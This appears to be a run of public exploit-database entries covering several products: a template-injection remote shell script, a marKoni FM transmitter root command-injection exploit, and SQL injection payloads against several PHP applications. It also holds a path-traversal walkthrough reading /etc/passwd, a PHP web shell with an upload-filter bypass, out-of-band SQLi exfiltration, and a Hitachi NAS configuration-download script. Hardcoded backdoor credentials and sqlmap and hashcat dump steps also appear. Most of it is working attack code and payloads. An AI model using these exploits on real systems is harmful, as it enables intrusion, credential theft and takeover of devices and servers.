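    full_url = f"{url.rstrip('/')}/template/aui/text-inline.vm"
    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
    return response.text.split('<!DOCTYPE html>')[0].strip()


def interactive_shell(url):
    """Read commands from a prompt and run each through send_payload() until exit/quit."""
    session = PromptSession()
    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
    while True:
        try:
            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
            if cmd.lower() in ["exit", "quit"]:
                break
            response = send_payload(url, cmd)
            console.print(response)
        except KeyboardInterrupt:
            break
        except requests.RequestException as e:
            # A single timeout or connection error should not end the session
            # (the original dropped out of the shell on any exception).
            console.print(f"[bold red]Request error: {e}[/bold red]")
        except Exception as e:
            console.print(f"[bold red]Error: {e}[/bold red]")
            break


def process_file(file_path):
    """Run args.command against every host listed one per line in ``file_path``.

    Hosts are addressed as http://<host>:8090. Blank lines are skipped, and a
    host that errors out is reported and skipped instead of aborting the whole
    sweep as the original did.
    """
    with open(file_path, 'r') as file:
        for line in file:
            ip = line.strip()
            if not ip:
                continue
            url = f"http://{ip}:8090"
            console.print(f"Processing {url}")
            try:
                print(send_payload(url, args.command))
            except requests.RequestException as e:
                console.print(f"[bold red]{url}: {e}[/bold red]")


# Main execution logic
if args.shell and args.url:
    interactive_shell(args.url)
elif args.url and args.command:
    print(send_payload(args.url, args.command))
elif args.file and args.command:
    process_file(args.file)
else:
    print("Error: Please provide a valid URL and a command or use the interactive shell option.")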
-
Backdrop CMS 1.23.0 - Stored XSS
# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field # Date: 2023-08-21 # Exploit Author: Sinem Şahin # Vendor Homepage: https://backdropcms.org/ # Version: 1.23.0 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/backdrop/node/add/post 2- Write your XSS payload in the body of the post, with the body's text format set to "Raw HTML" (the precondition is therefore an account that is allowed to select the Raw HTML text format). 3- Press the "Save" button; being stored XSS, the script then runs for anyone who views the saved post. XSS Payload ==> <script>alert("post_body")</script>
-
TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection
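#!/usr/bin/env python
#
#
# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
#
#
# Vendor: TELSAT Srl
# Product web page: https://www.markoni.it
# Affected version: Markoni-D (Compact) FM Transmitters
#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
#                   Markoni-A (Analogue Modulator) FM Transmitters
# Firmware: 1.9.5
#           1.9.3
#           1.5.9
#           1.4.6
#           1.3.9
#
# Summary: Professional FM transmitters.
#
# Desc: The marKoni FM transmitters are susceptible to unauthenticated
# remote code execution with root privileges. An attacker can exploit
# a command injection vulnerability by manipulating the Email settings'
# WAN IP info service, which utilizes the 'wget' module. This allows
# the attacker to gain unauthorized access to the system with administrative
# privileges by exploiting the 'url' parameter in the HTTP GET request
# to ekafcgi.fcgi.
#
# -------------------------------------------------------------------------
# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
# Authentication successful for backdoor
# Injecting command: whoami
# Listening on port 9999
# ('10.0.8.3', 47302) called back
# Received: root
# Housekeeping...
# Zya and thanks for stopping by!
#
# [lqwrm@metalgear ~]#
#
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            icorem6solox
#            lighttpd/1.4.33
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Macedonian Information Security Research and Development Laboratory
#                             Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2024-5808
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
#
#
# 10.11.2023
#

from colorama import init, Fore
import re,os,sys,requests
import socket,threading
from time import sleep
from urllib.parse import quote

init()

# Port the injected wget calls back to; "Default listening port" in usage.
LISTEN_PORT = 9999

# Per-request timeout in seconds; the original had none and could hang forever
# on a device that accepts the connection but never answers.
REQUEST_TIMEOUT = 15

# Credentials accepted by the device, keyed by the CLI <option>. The
# 'factory' / 'inokram25' pair is the hidden hard-coded super-administrator
# account (advisory ZSL-2024-5809); the original wrote these as \x-escaped
# strings with the same values.
CREDENTIALS = {
    "user": ("user", "user"),
    "admin": ("admin", "admin"),
    "backdoor": ("factory", "inokram25"),
}


def just_listen_to_me(lport, cstop):
    """Accept one TCP connection and print the User-Agent header it sends.

    execute() injects ``wget -U `command` <listen_ip>:9999``, so the
    command's output arrives here as the User-Agent of wget's HTTP request.
    Sets ``cstop`` once a client has connected. Runs in a worker thread and
    returns instead of calling exit(), so the main thread can join it.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate re-run while the previous listener is in TIME_WAIT.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        s.bind(("0.0.0.0", lport))
        s.listen(1)
        print("Listening on port " + str(lport))
        try:
            conn, addr = s.accept()
        except OSError as exc:
            # The original caught socket.timeout here (with no timeout set)
            # and then touched the never-assigned `conn`; report and leave.
            print("Call return timeout\nCheck your ports")
            print(exc)
            return
        print(addr, "called back")
        cstop.set()
        with conn:
            while True:
                try:
                    chunk = conn.recv(1771)
                except OSError:
                    print("Housekeeping...")
                    return
                if not chunk:
                    # Peer closed without a User-Agent line; the original
                    # spun forever here printing "No output for you".
                    print("No output for you")
                    return
                odg = chunk.decode(errors="replace")
                uam = re.search(r"User-Agent:\s*(.*)", odg)
                if uam:
                    print(f"Received: {uam.group(1)}")
                    return
                print("No output for you")
    finally:
        s.close()


def authenticate(ipaddr, option):
    """Log in via OpCode=1 and return the session cookie ("name=value"), or None.

    ``option`` must be a key of CREDENTIALS; any other value raises KeyError
    (the original left ``username`` unbound in that case).
    """
    auth_url = f"http://{ipaddr}"
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
    username, password = CREDENTIALS[option]
    authp = {
        'username': username,
        'password': password
    }
    resp = requests.get(auth_url + ep + "1", params=authp, timeout=REQUEST_TIMEOUT)
    if "Set-Cookie" in resp.headers:
        print(f"Authentication successful for {option}")
        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
        return auth_cookie
    print(f"Authentication failed for {option}.")
    print("Try a different option.")
    return None


def execute(ipaddr, cookie, command, listen_ip):
    """Inject ``command`` through the Email settings' WAN-IP "wget" service.

    Sequence: OpCode=26 enables the wget service with a crafted ``url`` value
    (``-U `command` <listen_ip>:9999`` — the backticks run the command and
    its output becomes wget's User-Agent), OpCode=27 appears to apply it,
    OpCode=26 with ena=0 disables the service again, and OpCode=3 with the
    com1 value appears to reset the related state.
    """
    print(f"Injecting command: {command}")
    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
    # NOTE(review): the published listing showed "¶m=" in the two OpCode=26
    # URLs — an HTML-entity rendering of "&param=" (&para -> ¶). Restored,
    # otherwise the "param" field never reaches the device.
    # The command is percent-encoded so spaces, '&' or '#' survive the query.
    enc_cmd = quote(command, safe='')
    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{enc_cmd}%60%20{listen_ip}:{LISTEN_PORT}"
    dva = f"http://{ipaddr}{ep}27"
    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
    headers = {"Cookie": cookie}
    requests.get(eden, headers=headers, timeout=REQUEST_TIMEOUT)
    sleep(2)
    requests.get(dva, headers=headers, timeout=REQUEST_TIMEOUT)
    sleep(2)
    requests.get(tri, headers=headers, timeout=REQUEST_TIMEOUT)
    sleep(1)
    requests.get(clear, headers=headers, timeout=REQUEST_TIMEOUT)
    # Return rather than exit(0) so the caller can join the listener thread.
    print("Zya and thanks for stopping by!")


def njaaah(text):
    """Print ``text`` centred on the terminal (80 columns when stdout is not a tty)."""
    try:
        columns = os.get_terminal_size().columns
    except OSError:
        # get_terminal_size() raises when output is redirected to a pipe/file.
        columns = 80
    print(text.center(columns))


zsl = "\033[91mWaddup!\033[0m" #Win64
# NOTE(review): banner whitespace was reflowed from a collapsed listing.
mrjox = f"""
       ________
      /        \\
     /  ____    \\
    | /  0   \\  |
    | \\______/  |
     \\____________/  {zsl}
      |          |
     /    \\
    /  O   \\
   |  O     \\
   |         \\
   |_________|
"""

if len(sys.argv) != 5:
    print()
    print("This is a PoC script for the marKoni transmitters 0day")
    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
    print("Option: 'user', 'admin', 'backdoor'")
    print("Default listening port: 9999")
    njaaah(mrjox)
    exit()

ipaddr = sys.argv[1]
opt = sys.argv[2]
listen_ip = sys.argv[3]
command = sys.argv[4]

if opt in CREDENTIALS:
    auth_cookie = authenticate(ipaddr, opt)
    if auth_cookie:
        cstop = threading.Event()
        lt = threading.Thread(target=just_listen_to_me, args=(LISTEN_PORT, cstop))
        lt.start()
        execute(ipaddr, auth_cookie, command, listen_ip)
        cstop.set()
        lt.join()
else:
    print("Invalid option.")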
-
TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password
TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: An unprivileged user can change their own password by calling the OpCode=4 handler directly; the request is honoured without any permission or session-cookie check, even though only administrators are supposed to edit users. This lets a low-privileged user (or anyone who can reach the endpoint) alter credentials, potentially gaining access to sensitive information or performing actions beyond their designated permissions. Tested on: GNU/Linux 3.10.53 (armv7l) icorem6solox lighttpd/1.4.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2024-5811 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php 10.11.2023 -- PoC request of a user changing his own password. Only admin can edit users. No permissions or Cookie check. (The URL must be quoted, otherwise the shell treats each & as a background operator.) $ curl -s -H "Cookie: name=user-1702119917" \ "http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t" HTTP/1.1 200 OK Content-type: text/html Cache-control: no-cache Set-Cookie: name=user-1702119917; max-age=315360000 Transfer-Encoding: chunked Date: Sat, 9 Dec 2023 11:05:17 GMT Server: lighttpd/1.4.33 oc=4&resp=0
-
TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure
TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: The transmitter has a hidden super administrative account 'factory' that has the hardcoded password 'inokram25' that allows full access to the web management interface configuration. The factory account is not visible in the users page of the application and the password cannot be changed through any normal operation of the device. The backdoor lies in the /js_files/LogIn_local.js script file. Attackers could exploit this vulnerability by logging in using the backdoor credentials for the web panel gaining also additional functionalities including: unit configuration, parameter modification, EEPROM overwrite, clearing DB, and factory log modification. Tested on: GNU/Linux 3.10.53 (armv7l) icorem6solox lighttpd/1.4.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2024-5809 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php CWE ID: 912 CWE URL: https://cwe.mitre.org/data/definitions/912.html 10.11.2023 -- The credentials can be seen in the auto_login() JS function in the unprotected /js_files/LogIn_local.js file: $ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()" function auto_login() { // @mod1 var username = "factory"; var password = "inokram25"; $
-
xbtitFM 4.1.18 - Multiple Vulnerabilities
# Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities # Date: 22-01-2024 # Vendor Homepage: https://xbtitfm.eu # Affected versions: 4.1.18 and prior # Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM. The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account. Given the state and the age of the codebase there are probably further issues; the three below are the ones that were verified. [Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] Some examples (error-based, via the msgid parameter): Get DB name: /shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100)))) Get DB user: /shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100)))) Get password hash of any user (might need some modification to work on different instances): /shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2); Automate it with sqlmap to dump the database. 
1) Get DB name sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db 2) Get table names sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables 3) Dump users table (usually called xbtit_users) sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump 4) Crack hashes (usually unsalted MD5) hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one) [Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N] 1) Intentionally request a file that doesn't exist; the resulting error discloses the web application path, e.g. /home/xbtitfm/public_html/ https[:]//example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path 2) Read files that contain database credentials. https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php Or any other system file you want. https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd 3) With the credentials in hand the SQLi is no longer needed to dump the DB. Check whether the following file is configured https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php If so, go to https[:]//example.xyz/sxd (CBT SQL backup utility, aka Sypex Dumper), log in with the DB credentials you just found, and export the DB with one click. 
[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H] If that wasn't enough already and you want RCE, visit https[:]//example.xyz/index.php?page=file_hosting If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass. Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enough to bypass the filetype checks. A silly countermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it. Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php" Content-Type: image/gif GIF89a; <html> <body> <form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?pHp if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> The web shell will then be uploaded here: https[:]//example.xyz/file_hosting/definately_not_a_shell.php If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.
-
Quick.CMS 6.7 - SQL Injection Login Bypass
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass # Google Dork: N/A # Date: 02-03-2024 # Exploit Author: ./H4X.Forensics - Diyar # Vendor Homepage: https://www.opensolution.org # Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip # Version: 6.7 # Tested on: Windows # CVE : N/A How to exploit : *--> Open the admin panel at: http://127.0.0.1:8080/admin.php *--> Enter any e-mail address, e.g.: [email protected] *--> Enter the SQL injection authentication bypass payload: ' or '1'='1 *--> Tick the checkbox *--> Press Login *--> Congratz! The login form concatenates the submitted value into its SQL query, so the always-true condition bypasses authentication. *--> Alternative payloads for the same field: ' or '1'='1 ' or ''=' ' or 1]%00 ' or /* or ' ' or "a" or ' ' or 1 or ' ' or true() or '
-
Employee Management System 1.0 - 'admin_id' SQLi
# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi # Date: 20-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-28595 # Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php (the PoC below is performed after logging in). # POC: 1. Browse to: http://127.0.0.1/taskmatic/index.php 2. Log in with the default username and password. 3. Visit the URL: http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843 WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||' 4. The response is delayed by roughly 5 seconds — the SLEEP(5) in the payload — which confirms time-based blind SQL injection through admin_id. # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md
-
Blood Bank 1.0 - 'bid' SQLi
# Exploit Title: Blood Bank 1.0 - 'bid' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46022 ------------------------------------------------------------------------------- # Description: The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases. Vulnerable File: /delete.php Parameter Name: bid # Proof of Concept: ---------------------- 1. Intercept the request to /bloodbank/file/delete.php (reached from bloodinfo.php) via Burp Suite 2. Inject the payload into the vulnerable bid parameter 3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b' 4. Example request for bid parameter: --- GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Referer: http://localhost/bloodbank/bloodinfo.php Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 --- 5. The database and version information arrive at Burp Suite Collaborator embedded in the hostname (<version>.<database>.<collaborator-domain>) that the database server tries to resolve when load_file() dereferences the UNC path; the technique therefore depends on the DB host actually attempting that lookup.
-
HNAS SMU 14.8.7825 - Information Disclosure
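# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
# CVE: CVE-2023-6538
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04

import argparse
from os import getcwd

import requests


def build_parser():
    """Build the command-line parser for this PoC.

    The parser is built here instead of at module level so that importing
    the file no longer parses ``sys.argv``; ``main`` is the only caller.

    Returns:
        argparse.ArgumentParser with ``--host``, ``--id``, ``--sso`` and
        ``--serverid``, all required.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2023-6538 PoC",
        usage=(
            "./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> "
            "--sso <JSESSIONIDSSO> --serverid <Server ID>"
        ),
    )
    # Create --host argument:
    parser.add_argument(
        "--host",
        required=True,
        type=str,
        help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443",
    )
    # Create --id argument:
    parser.add_argument("--id", required=True, type=str, help="JSESSIONID cookie value")
    # Create --sso argument:
    parser.add_argument("--sso", required=True, type=str, help="JSESSIONIDSSO cookie value")
    # Create --serverid argument. The original script registered this as a
    # second "--id", which makes argparse raise "conflicting option string"
    # before any request is built; the server id needs its own flag.
    parser.add_argument("--serverid", required=True, type=str, help="Server ID value")
    return parser


def download_file(hostname, jsessionid, jsessionidsso, serverid, *, verify=False):
    """Fetch the SMU configuration archive and write it to the CWD.

    Args:
        hostname: SMU host, optionally with port (e.g. ``127.0.0.1:8443``).
        jsessionid: value of the ``JSESSIONID`` cookie of an authenticated session.
        jsessionidsso: value of the ``JSESSIONIDSSO`` cookie of that session.
        serverid: value sent as the ``serverid`` query parameter.
        verify: handed to ``requests.get``; ``False`` (the default, matching the
            original PoC) disables TLS certificate verification.

    Returns:
        None. Writes ``registry_data.tgz`` in the current directory and prints
        where it was written.

    Raises:
        requests.HTTPError: if the SMU answers with a 4xx/5xx status, so an
            error or login page is not silently saved as the archive.
    """
    # Set the filename:
    filename = "registry_data.tgz"
    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
    # GET request cookies
    smu_cookies = {
        "JSESSIONID": jsessionid,
        "JSESSIONIDSSO": jsessionidsso,
    }
    # GET request headers:
    smu_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Dnt": "1",
        "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Te": "trailers",
        "Connection": "close",
    }
    # NOTE(review): with verify=False both session cookies are sent to whatever
    # answers at `hostname`; pass verify=<path to the SMU's CA bundle> where one
    # is available.
    # Send the request:
    with requests.get(
        smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=verify
    ) as file_download:
        # Do not write an error/login page to disk as if it were the archive.
        file_download.raise_for_status()
        with open(filename, "wb") as backup_archive:
            # Write the archive to the CWD in chunks rather than buffering all
            # of .content in memory first.
            for chunk in file_download.iter_content(chunk_size=64 * 1024):
                backup_archive.write(chunk)
    # Report the file actually written (the original message did not name it).
    print(f"{filename} has been downloaded to {getcwd()}")


def main():
    """Parse the command line and download the archive."""
    args = build_parser().parse_args()
    download_file(args.host, args.id, args.sso, args.serverid)


if __name__ == "__main__":
    main()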
-
Simple Task List 1.0 - 'status' SQLi
# Exploit Title: Simple Task List 1.0 - 'status' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46023 ------------------------------------------------------------------------------- # Description: Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. Vulnerable File: /addTask.php Parameter Name: status # Proof of Concept: ---------------------- 1. Register and log in to the system 2. Add a project and a task 3. Then use sqlmap to exploit the parameter 4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db # SQLMap Response: ---------------------- --- Parameter: status (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||' ---
-
Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645 # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46024 ------------------------------------------------------------------------------- # Description: Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. Vulnerable File: /index.php Parameter Name: searchdata # Proof of Concept: ---------------------- Execute sqlmap using either the 'searchdata' parameter to retrieve the current database: sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db SQLMap Response: ---------------------- --- Parameter: searchdata (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: searchdata=test%';SELECT SLEEP(5)#&search= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=test%' AND (SELECT 8862 FROM 
(SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search= ---